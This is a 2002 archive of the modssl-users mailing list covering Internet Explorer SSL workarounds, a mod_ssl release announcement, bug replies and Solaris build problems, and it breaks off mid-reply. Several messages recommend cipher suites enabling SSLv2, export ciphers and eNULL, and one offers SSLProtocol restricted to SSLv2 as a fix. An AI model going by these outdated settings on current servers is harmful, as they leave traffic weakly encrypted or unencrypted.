Lilback >On 2/6/02 1:25 PM, Mark J. Lilback wrote: >> Hi... I saw an old message you'd posted to the modssl-users list >> about IE problems. Did you ever resolve this? > >No, and it still drives me nuts to this day... :-/ I just solved it. Do not use an SSLProtocol line. Comment out the SetEnvIf line that does nokeepalive for MSIE. Use the following instead. BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown I'm also using this cipher suite line, but the default might work, too: SSLCipherSuite !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM: +LOW:+SSLv2:+EXP:+eNULL This took way too long to figure out, but at least it works now. Please post this to any list/newsgroup you find appropriate, as I don't have usenet access (and I saw a ton of questions about this on the mac ie newsgroup) and ended up having to piece together numerous pieces of the solution from numerous other posts. --- -John ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 16:45:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16203; Wed, 27 Mar 2002 16:44:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA16190; Wed, 27 Mar 2002 16:43:54 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id ED5184CE764; Wed, 27 Mar 2002 16:43:52 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2RFhCX74411; Wed, 27 Mar 2002 16:43:12 +0100 (CET) Date: Wed, 27 Mar 2002 16:43:12 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: [PATCH] outstanding shmcb fixes Message-ID: <20020327154312.GA74392@engelschall.com> References: <20020325230135.A27278@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020325230135.A27278@redhat.com> User-Agent: Mutt/1.3.28i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Mar 25, 2002, Joe Orton wrote: > Here are the outstanding shmcb changes which didn't make it into 2.8.7, > extracted from Geoff's patch. These fix the remaining SIGBUS problem(s) > on SPARC etc. Now comitted for mod_ssl 2.8.8. Thanks for remembering me. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 16:45:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16208; Wed, 27 Mar 2002 16:44:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA16189; Wed, 27 Mar 2002 16:43:54 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id CAC824CE75F; Wed, 27 Mar 2002 16:43:52 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2REN4S69948; Wed, 27 Mar 2002 15:23:04 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from main.route66.ro id OAA04729; Wed, 27 Mar 2002 14:15:36 +0100 (MET) Received: from bv26 ([192.168.2.126]) by main.route66.ro (8.10.2/8.10.2/SuSE Linux 8.10.0-0.3) with SMTP id g2RDFKE11204; Wed, 27 Mar 2002 15:15:21 +0200 X-Authentication-Warning: main.route66.ro: Host [192.168.2.126] claimed to be bv26 From: "Emanuel Dejanu" To: Cc: Subject: RE: No solution for bug with IE on Mac? Date: Wed, 27 Mar 2002 15:15:12 +0200 Message-ID: <20285A942B45D5118B1400A0D2A461550285AA@NTSERVER> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Emanuel Dejanu" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users No error when connect to: https://secure.anet.at/ What OS, IE versions do you use. Win2000, IE6.0 (will the lastest Windows Updates) Best regards, Emanuel Dejanu P.S. I'm not on the modssl-users@modssl.org list. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 18:57:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA29080; Wed, 27 Mar 2002 18:56:28 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns3.acsol.net id SAA28981; Wed, 27 Mar 2002 18:55:21 +0100 (MET) Received: from jupiter (jupiter.acsol.net [12.45.116.4]) by ns3.acsol.net (8.11.6/8.11.6) with SMTP id g2RHtUL08367 for ; Wed, 27 Mar 2002 10:55:30 -0700 (MST) From: "Vince Church" To: "ModSSL UserGroup" Subject: Solaris 8 - ModSSL 2.8.7-1.3.23 and libssl.so problems Date: Wed, 27 Mar 2002 10:54:46 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Vince Church" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Everyone, I've researched the archives and found several users with this same problem, but none of the solutions seems to work for me. Does anyone know the workaround or solution? Basically I have: mod_ssl-2.8.7-1.3.23 openssl-0.9.6c mm-1.1.3 apache_1.3.23 Solaris 8 (x86) When I try to run apache, the following message occurs. # ./apachectl startssl Syntax error on line 206 of /usr/local/apache/conf/httpd.conf: Cannot load /usr/local/apache/libexec/libssl.so into server: ld.so.1: /usr/local/apache/bin/httpd: fatal: relocation error: file /usr/local/apache/libexec/libssl.so: symbol ap_user_id: referenced symbol not found ./apachectl startssl: httpd could not be started Hope I have not missed the answer somewhere else... Thank You in advance, Vince ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:19:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01528; Wed, 27 Mar 2002 19:18:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id TAA01439; Wed, 27 Mar 2002 19:17:25 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B3E514CE69A; Wed, 27 Mar 2002 19:16:27 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g2RIC0w84524; Wed, 27 Mar 2002 19:12:00 +0100 (CET) Date: Wed, 27 Mar 2002 19:12:00 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.8-1.3.24 Message-ID: <20020327181200.GA84415@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Apache 1.3.24 was released and so I take this opportunity to both provide an aligned mod_ssl version for it and flush the pending bugfixes. The corresponding CHANGES entries are appended below. Fetch mod_ssl 2.8.8 from the following locations: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.8 (23-Feb-2002 to 27-Mar-2002) *) Upgraded to Apache 1.3.24 *) Support leading whitespaces in commands of SSLLog "|..." directives. *) Fixed timeout handling on connection establishment by correctly resetting the timeout on errors. *) Fixed two memory leaks related to CA certificate configuration. *) Fixed memory leak related to temporary DH key handling. *) Fixed memory leak on shutdown if CRLs are used. *) Fixed remaining SIGBUS problems on SPARC inside SHMCB session cache implementation. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:25:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02069; Wed, 27 Mar 2002 19:24:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mx3.megamailservers.com id TAA01946; Wed, 27 Mar 2002 19:23:14 +0100 (MET) Received: from slim.hostopia.com (slim.hostopia.com [64.29.150.3]) by mx3.megamailservers.com (8.12.2/8.12.2) with ESMTP id g2RIN7cx028487 for ; Wed, 27 Mar 2002 13:23:07 -0500 Date: Wed, 27 Mar 2002 13:23:01 -0500 (EST) From: Bill Robbins X-X-Sender: To: Subject: invalid keys preventing apache start. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bill Robbins X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Support, Is there a command line argument or directive that would allow you to bypass invalid keys, which prevent apache from starting? [26/Mar/2002 11:37:33 31000] [info] Init: Configuring server www.domain.com:443 for SSL protocol [26/Mar/2002 11:37:33 31000] [error] Init: (www.domain.com:443) Unable to configure RSA server private key (OpenSSL library error follows) [26/Mar/2002 11:37:33 31000] [error] OpenSSL: error:0B080074:x509 certificate routines:X509_check_private_key:key values mismatch Thanks, Bill ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:25:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02093; Wed, 27 Mar 2002 19:24:49 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zeus.epr.com id TAA02025; Wed, 27 Mar 2002 19:23:56 +0100 (MET) Received: from exchange.epr.com (exchange.epr.com [198.3.162.249]) by zeus.epr.com (8.11.6/8.11.6) with ESMTP id g2RIHuh09642 for ; Wed, 27 Mar 2002 10:17:56 -0800 (PST) Received: by exchange.epr.com with Internet Mail Service (5.5.2653.19) id ; Wed, 27 Mar 2002 10:23:00 -0800 Message-ID: <3C124172E7FDD511B510000347426D592DD6DB@exchange.epr.com> From: Lily Tian To: "'modssl-users@modssl.org'" Subject: RE: Solaris 8 - ModSSL 2.8.7-1.3.23 and libssl.so problems Date: Wed, 27 Mar 2002 10:22:59 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lily Tian X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I had this problem before. I think this is because the libssl.so is not built correctly. Try to do the following: 1) cd /openssl-0.9.6c sh config no-thread -fPIC make make test cd .. 2) cd mod_ssl-2.8.6-1.3.23 ./confgiure --with-apache=/u02/app/apache_1.3.23 --with-ssl=../openssl-0.9.6c --prefix=/u02/app/apache --enable-shared=ssl --enable-module=ssl --enable-module=so --enable-rule=SHARED_CORE 3) cd /u02/app/apache_1.3.23 make make certificate make install Here I was using mod_ssl-2.8.6-1.3.23, I also try it on mod_ssl-2.8.7-1.3.23. It should works. Good luck! Lily -----Original Message----- From: Vince Church [mailto:vchurch@acsol.net] Sent: Wednesday, March 27, 2002 9:55 AM To: ModSSL UserGroup Subject: Solaris 8 - ModSSL 2.8.7-1.3.23 and libssl.so problems Hi Everyone, I've researched the archives and found several users with this same problem, but none of the solutions seems to work for me. Does anyone know the workaround or solution? Basically I have: mod_ssl-2.8.7-1.3.23 openssl-0.9.6c mm-1.1.3 apache_1.3.23 Solaris 8 (x86) When I try to run apache, the following message occurs. # ./apachectl startssl Syntax error on line 206 of /usr/local/apache/conf/httpd.conf: Cannot load /usr/local/apache/libexec/libssl.so into server: ld.so.1: /usr/local/apache/bin/httpd: fatal: relocation error: file /usr/local/apache/libexec/libssl.so: symbol ap_user_id: referenced symbol not found ./apachectl startssl: httpd could not be started Hope I have not missed the answer somewhere else... Thank You in advance, Vince ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:34:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02695; Wed, 27 Mar 2002 19:33:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA02686; Wed, 27 Mar 2002 19:33:01 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 59F8A4CE695; Wed, 27 Mar 2002 19:33:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2RIWZW85281; Wed, 27 Mar 2002 19:32:35 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id TAA29560; Wed, 27 Mar 2002 19:00:10 +0100 (MET) Date: Wed, 27 Mar 2002 19:00:10 +0100 (MET) Message-Id: <200203271800.TAA29560@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] SSLLog into pipe (PR#678) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, Mar 20, 2002, modssl-bugdb@modssl.org wrote: > Full_Name: martin vetter > Version: 2.8.5 > OS: mac os 10.1.3 > Submission from: (NULL) (62.16.152.206) > > SSLLog "|/usr/sbin/rotatelogs /var/log/httpd/ssl_engine_log 86400" > > does work. > > SSLLog "| /usr/sbin/rotatelogs /var/log/httpd/ssl_engine_log 86400" > > does not (note the whitespace after "|"). > "ErrorLog" and "CustomLog" do support whitespace after the "|" ... > > bug or feature? or am i missing something? mod_ssl 2.8.8 will support leading whitespaces now. Thanks for the hint. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:34:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02698; Wed, 27 Mar 2002 19:33:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA02687; Wed, 27 Mar 2002 19:33:01 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 69E444CE741; Wed, 27 Mar 2002 19:33:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2RIWen85287; Wed, 27 Mar 2002 19:32:40 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id TAA29573; Wed, 27 Mar 2002 19:00:14 +0100 (MET) Date: Wed, 27 Mar 2002 19:00:14 +0100 (MET) Message-Id: <200203271800.TAA29573@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] more helpful message when failing to get mutex (PR#679) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Mar 21, 2002, modssl-bugdb@modssl.org wrote: > Full_Name: Fred Romelfanger > Version: 2.8.7 > OS: Solaris > Submission from: (NULL) (130.167.114.38) > > During a stress test with modssl, I get the following error: > > [21/Mar/2002 13:37:55 14476] [warn] Failed to acquire global mutex lock > > Looking at the code, it would be nice to get the unix errno or error > message assocated with the failed call to semop(). I added a perror > call and the error it actually failed with was ENOSPC which indicates > that I don't have the system configured with enough semaphore "undo" > structures for the number of apache servers that I had running. I agree that the error is less specific. But the problem is that the error is a general message produced by the mutex abstraction layer while the errno is only available in the underlying semop based mutex implementation. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 19:34:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02701; Wed, 27 Mar 2002 19:33:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA02688; Wed, 27 Mar 2002 19:33:02 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 78CB54CE75B; Wed, 27 Mar 2002 19:33:01 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2RIWhv85293; Wed, 27 Mar 2002 19:32:43 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id TAA29588; Wed, 27 Mar 2002 19:00:18 +0100 (MET) Date: Wed, 27 Mar 2002 19:00:18 +0100 (MET) Message-Id: <200203271800.TAA29588@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] PRIVATE: bogus SSL handshake timeouts under load? (PR#680) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Mar 21, 2002, modssl-bugdb@modssl.org wrote: > [...] > [Thu Mar 21 12:14:29 2002] [error] mod_ssl: SSL handshake timed out (client > 130.167.114.38, server hoth.stsci.edu:443) > > When the timeout occurs one of my threads (in java) that is making the > https connection locks up. > > I believe the timeout is not being reset if some sort of error that > occurs on a prior pass through the module. Good catch. Yes, on errors it was not reset. This is now fixed with mod_ssl 2.8.8. Thanks for discovering this bug. > [...] > Also the timeouts appear to be too short. I didn't understand that. > It looks like it is supposed to use the Timeout value from the apache > configuration file. I have this set to 300 (seconds), but the timeout > occurs sooner than that, so there maybe something else going on that > I don't see. Hmmm.... I would also say it has to a large timeout value. But because of the missing reset it could be short as a side-effect of the bug, of course. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 21:57:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13132; Wed, 27 Mar 2002 21:56:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id VAA13079; Wed, 27 Mar 2002 21:55:23 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2RKooA29165; Wed, 27 Mar 2002 15:50:50 -0500 Date: Wed, 27 Mar 2002 15:50:50 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: Mod SSL cc: Robert Allerstorfer Subject: Re: No solution for bug with IE on Mac? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wed, 27 Mar 2002, John Siracusa wrote: > BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown > > SSLCipherSuite > !EXP1024-RC4-SHA:!EXP1024-DES-CBC-SHA:ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM: > +LOW:+SSLv2:+EXP:+eNULL That !EXP56 should be !EXPORT56 . And by the way, the mod_ssl FAQ recommends this: SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP which is pretty similar to what you have but slightly less restrictive. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 27 22:47:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA16388; Wed, 27 Mar 2002 22:46:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id WAA16356; Wed, 27 Mar 2002 22:46:08 +0100 (MET) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g2RLk6a01882 for ; Wed, 27 Mar 2002 16:46:06 -0500 From: "Jeremy Walton" To: Subject: IE bug with mod_ssl? Date: Wed, 27 Mar 2002 16:45:49 -0500 Message-ID: <004701c1d5d8$c2af11b0$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 In-Reply-To: Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I think this just may be a bug with IE but I'm not sure. When I use CGI scripting with the default install of (Caldera OpenLinux 3.1 or 3.11, Not sure of the mod_ssl version and if someone can tell me how to find out I'll post it too). I found the problem with XP(IE 6) but for W98 and W2k (IE6 or IE5), every now and then I get a page cannot be displayed error, but If I took mod_ssl off and used standard http, it worked fine. Now I did find a fix for this but I wanted some info from the group on this. I put a SSLProtocol -all +SSLv2 This allowed me to only use the SSL version 2 protocol. This worked perfectly. Anyone on any guess for this? Jeremy Walton DICE Corporation Software Engineer ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 00:09:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA21832; Thu, 28 Mar 2002 00:08:45 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ext-mail.valicert.com id AAA21748; Thu, 28 Mar 2002 00:07:12 +0100 (MET) Received: from CONVERSION-DAEMON by ext-mail.valicert.com (PMDF V5.2-33 #46613) id <0GTN00301MT58H@ext-mail.valicert.com> for modssl-users@modssl.org; Wed, 27 Mar 2002 15:05:29 -0800 (PST) Received: from polaris.valicert.com ([192.168.2.34]) by ext-mail.valicert.com (PMDF V5.2-33 #46613) with ESMTP id <0GTN00371MT52T@ext-mail.valicert.com> for modssl-users@modssl.org; Wed, 27 Mar 2002 15:05:29 -0800 (PST) Received: by polaris.valicert.com with Internet Mail Service (5.5.2653.19) id ; Wed, 27 Mar 2002 15:07:03 -0800 Content-return: allowed Date: Wed, 27 Mar 2002 15:07:03 -0800 From: Himanshu Soni Subject: ap_hook_pool and ssl_var_lookup on solaris To: modssl-users@modssl.org Message-id: <613B3C619C9AD4118C4E00B0D03E7C3E0297EEA9@polaris.valicert.com> MIME-version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Himanshu Soni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I have written a module that calls ap_hook_call(char *hook). The hook called is ap::mod_ssl::var_lookup which is registered when mod_ssl loads up in the void (*add_module) (struct module_struct *) call. However, when I make call, at run time, my module dumps core because ap_hook_pool is not initialized for that instance. Does it have something to do with child processes on solaris not being able to get handle to the hook pool? Any ideas? Help is greatly appreciated. Thanx Himanshu Soni ValiCert Inc. http://www.valicert.com Software Engineer phone: 650-567-5491 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 03:05:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA08311; Thu, 28 Mar 2002 03:04:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA08207; Thu, 28 Mar 2002 03:03:09 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id EA98F4CE617; Thu, 28 Mar 2002 03:03:07 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2RJWNi86951; Wed, 27 Mar 2002 20:32:23 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from alpha.url.com.tw id UAA06883; Wed, 27 Mar 2002 20:18:48 +0100 (MET) Received: (qmail 8561 invoked from network); 27 Mar 2002 20:39:29 -0000 Received: from msa.url.com.tw ([210.59.228.142]) (envelope-sender ) by alpha.url.com.tw (qmail-ldap-1.03) with SMTP for ; 27 Mar 2002 20:39:29 -0000 Received: (qmail 27443 invoked from network); 27 Mar 2002 19:15:44 -0000 Received: from unknown (HELO youandme) ([140.128.101.118]) (envelope-sender ) by msa.url.com.tw (qmail-ldap-1.03) with SMTP for ; 27 Mar 2002 19:15:44 -0000 Message-ID: <001601c1d5c4$e97b9020$7665808c@youandme> From: "=?big5?B?rnDbdQ==?=" To: Subject: Build SSL on Access Remote Database Date: Thu, 28 Mar 2002 03:23:44 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "=?big5?B?rnDbdQ==?=" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear All: I use PHP to access remote MySQL database, and I wish build SSL on their connection. My web server is Apache 1.3.23 I know programing,but I don't know how to begin. Can anybody help me. Just tell me how to begin. Thank a lot. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 04:27:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA17347; Thu, 28 Mar 2002 04:26:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id EAA17316; Thu, 28 Mar 2002 04:25:56 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16qQY0-0000Di-00 for modssl-users@modssl.org; Thu, 28 Mar 2002 03:25:56 +0000 Received: from 217.135.215.204 ( [217.135.215.204]) as user nick@localhost by webmail.regiocom.net with HTTP; Thu, 28 Mar 2002 03:25:56 +0000 Message-ID: <1017285956.3ca28d44276b1@webmail.regiocom.net> Date: Thu, 28 Mar 2002 03:25:56 +0000 From: Nick Miles To: modssl-users@modssl.org Subject: Re: Build SSL on Access Remote Database References: <001601c1d5c4$e97b9020$7665808c@youandme> In-Reply-To: <001601c1d5c4$e97b9020$7665808c@youandme> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.1 X-Originating-IP: 217.135.215.204 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nick Miles X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I think 